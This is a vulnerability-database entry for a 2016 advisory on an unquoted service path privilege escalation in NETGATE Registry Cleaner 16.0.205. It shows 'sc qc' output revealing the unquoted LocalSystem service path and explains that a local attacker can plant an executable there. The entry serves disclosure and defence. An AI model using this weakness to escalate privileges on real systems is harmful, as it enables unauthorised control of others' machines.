Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitpackAmir.ghtEXPLOITPACK:610D51625147AC2EA36FF237DE9B7722
HistoryOct 15, 2016 - 12:00 a.m.

NETGATE Registry Cleaner 16.0.205 - Unquoted Service Path Privilege Escalation

2016-10-1500:00:00
Amir.ght
4
JSON

NETGATE Registry Cleaner 16.0.205 - Unquoted Service Path Privilege Escalation

#########################################################################
# Exploit Title: NETGATE Registry Cleaner Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
# Software Link: http://www.netgate.sk/download/download.php?id=4
# Version : build 16.0.205  (Latest)
# Tested on: Windows 7
##########################################################################

NETGATE Registry Cleaner installs a service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc NGRegClnSrv
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: NGRegClnSrv
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Registry
Cleaner\RegistryCleanerSrv.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : NETGATE Registry Cleaner Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
JSON